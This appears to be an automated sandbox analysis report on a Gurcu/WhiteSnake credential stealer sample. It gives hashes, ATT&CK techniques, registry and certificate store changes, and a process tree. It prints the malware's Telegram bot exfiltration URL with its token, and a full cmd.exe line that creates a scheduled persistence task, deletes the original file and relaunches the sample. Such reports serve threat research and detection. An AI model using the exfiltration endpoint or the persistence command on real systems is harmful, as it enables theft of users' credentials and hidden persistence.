gurcu | 44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31

Resubmissions

10/04/2024, 02:49 UTC

240410-da1n1sfe7v 10

10/04/2024, 02:49 UTC

240410-daz3gscc34 10

10/04/2024, 02:48 UTC

240410-dazfyscc32 10

10/04/2024, 02:48 UTC

240410-dayvesfe7s 10

14/10/2023, 03:45 UTC

231014-ea62gage69 10

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
14/10/2023, 03:45 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

B9a5797cb584014f3fede.exe
Size

530KB
MD5

862e7aeb18ba5892f51b5712a213a614
SHA1

99d86e4247f52c3ea9b2bb476af66dfc7707fa8d
SHA256

44eca198c64197c511441f644895afd6a2777c28bcb6a376d4d4623b030ced31
SHA512

678fc8fb5dc887f41db90e6341229ce35c830ffac4cbb91ea669ab5e8bc849bae05c15909ae62e4dfd3a249bb2ff062eaa0e256989fe203863db0396c60ec713
SSDEEP

6144:XHClm6SWPoK5Z0EwVSmRPQd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHd8JyO:XHCnZxb88RatpvnzZjDv7oj19yTNTY

Score

10^/10

gurcu collection spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6176004110:AAFKA5be4dMwA848HWxzYIzrzzOGIHMOJGc/sendMessage?chat_id=615133582

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Deletes itself 1 IoCs

pid	Process
2920	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2808	B9a5797cb584014f3fede.exe
2400	B9a5797cb584014f3fede.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2852	schtasks.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	B9a5797cb584014f3fede.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000020000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	B9a5797cb584014f3fede.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	B9a5797cb584014f3fede.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	B9a5797cb584014f3fede.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	B9a5797cb584014f3fede.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2592	PING.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	B9a5797cb584014f3fede.exe
Token: SeDebugPrivilege	2808	B9a5797cb584014f3fede.exe
Token: SeDebugPrivilege	2400	B9a5797cb584014f3fede.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2552 wrote to memory of 2920	2552	B9a5797cb584014f3fede.exe	28
PID 2552 wrote to memory of 2920	2552	B9a5797cb584014f3fede.exe	28
PID 2552 wrote to memory of 2920	2552	B9a5797cb584014f3fede.exe	28
PID 2920 wrote to memory of 1780	2920	cmd.exe	30
PID 2920 wrote to memory of 1780	2920	cmd.exe	30
PID 2920 wrote to memory of 1780	2920	cmd.exe	30
PID 2920 wrote to memory of 2592	2920	cmd.exe	31
PID 2920 wrote to memory of 2592	2920	cmd.exe	31
PID 2920 wrote to memory of 2592	2920	cmd.exe	31
PID 2920 wrote to memory of 2852	2920	cmd.exe	32
PID 2920 wrote to memory of 2852	2920	cmd.exe	32
PID 2920 wrote to memory of 2852	2920	cmd.exe	32
PID 2920 wrote to memory of 2808	2920	cmd.exe	33
PID 2920 wrote to memory of 2808	2920	cmd.exe	33
PID 2920 wrote to memory of 2808	2920	cmd.exe	33
PID 2808 wrote to memory of 1048	2808	B9a5797cb584014f3fede.exe	35
PID 2808 wrote to memory of 1048	2808	B9a5797cb584014f3fede.exe	35
PID 2808 wrote to memory of 1048	2808	B9a5797cb584014f3fede.exe	35
PID 1604 wrote to memory of 2400	1604	taskeng.exe	37
PID 1604 wrote to memory of 2400	1604	taskeng.exe	37
PID 1604 wrote to memory of 2400	1604	taskeng.exe	37
PID 2400 wrote to memory of 2164	2400	B9a5797cb584014f3fede.exe	38
PID 2400 wrote to memory of 2164	2400	B9a5797cb584014f3fede.exe	38
PID 2400 wrote to memory of 2164	2400	B9a5797cb584014f3fede.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	B9a5797cb584014f3fede.exe

C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe
"C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\B9a5797cb584014f3fede.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1780
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:2592
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "B9a5797cb584014f3fede" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2852
- - C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
    "C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2808 -s 1724
      4⤵
      PID:1048

C:\Windows\system32\taskeng.exe
taskeng.exe {377E64C6-E20C-4872-8CE0-734BF4CC2CB4} S-1-5-21-86725733-3001458681-3405935542-1000:ZWKQHIWB\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
